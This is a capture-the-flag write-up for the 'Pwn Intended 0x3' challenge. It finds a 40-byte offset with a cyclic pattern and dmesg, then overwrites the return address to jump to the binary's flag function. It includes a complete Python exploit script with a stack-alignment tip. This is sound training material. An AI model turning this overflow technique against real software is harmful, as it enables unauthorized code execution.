Pwn Intended 0x3



Same idea as Pwn Intended 0x2, but this time our destination isn't as visible.

Start by analyzing the binary.


Nothing interesting in main. We did notice sym.flag, though, so let's check that out.


That's what we want, so it looks like we'll want to jump to 0x004011ce.

Same as 0x2: find your padding using python and dmesg.


We can see that our input starts leaking into the return address at byte 41, so we'll use 40 bytes of padding.

Script:

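The script itself was only in a screenshot, so here is an added example that is not the author's code: it reproduces the two steps of the write-up with the standard library only (no pwntools). `cyclic_pattern` / `cyclic_find` cover the "find your padding with python and dmesg" step, and `build_payload` builds the 40 bytes of padding followed by the address of sym.flag. The values `PADDING = 40` and `FLAG_ADDR = 0x004011ce` come from the write-up; the binary path `./pwn-intended-0x3` and the assumption that it is a 64-bit, non-PIE executable (which the 0x0040.... address is consistent with) are mine.

```python
import string
import struct
import subprocess
import sys

FLAG_ADDR = 0x004011CE   # address of sym.flag from the disassembly in the write-up
PADDING = 40             # bytes before the saved return address (write-up: leak starts at byte 41)
BINARY = "./pwn-intended-0x3"   # assumed path to the challenge binary


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every short window is unique
    within the first 20280 bytes, so whatever lands in the faulting
    register can be mapped back to an offset."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def cyclic_find(needle, pattern):
    """Offset of the pattern bytes that dmesg reported (taken from the
    faulting ip/sp value, little-endian) inside the pattern, or -1."""
    return pattern.find(needle)


def build_payload(padding=PADDING, target=FLAG_ADDR):
    """Overwrite the saved return address with the address of sym.flag.
    Assumes a 64-bit binary: the address is packed as 8 bytes, little-endian."""
    return b"A" * padding + struct.pack("<Q", target)


def run(binary=BINARY, payload=None):
    """Feed the payload to the binary on stdin and return its output."""
    payload = payload if payload is not None else build_payload()
    proc = subprocess.run([binary], input=payload + b"\n",
                          capture_output=True, timeout=5)
    return proc.stdout


if __name__ == "__main__":
    # "python3 script.py pattern 100" prints a 100-byte pattern to crash the binary with;
    # "python3 script.py find Aa3A" tells you where those bytes sat in the pattern;
    # plain "python3 script.py" sends the final payload.
    if len(sys.argv) > 2 and sys.argv[1] == "pattern":
        sys.stdout.buffer.write(cyclic_pattern(int(sys.argv[2])))
    elif len(sys.argv) > 2 and sys.argv[1] == "find":
        print(cyclic_find(sys.argv[2].encode(), cyclic_pattern(20280)))
    else:
        sys.stdout.buffer.write(run())
```

Feed the pattern to the binary, pull the bytes out of the segfault line in dmesg, and `cyclic_find` gives the offset that the write-up found by hand (40). One caveat worth knowing on 64-bit targets: if sym.flag crashes inside a `movaps`-style instruction after the jump, the stack is misaligned by 8 and a single `ret` gadget in front of the target address fixes it.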
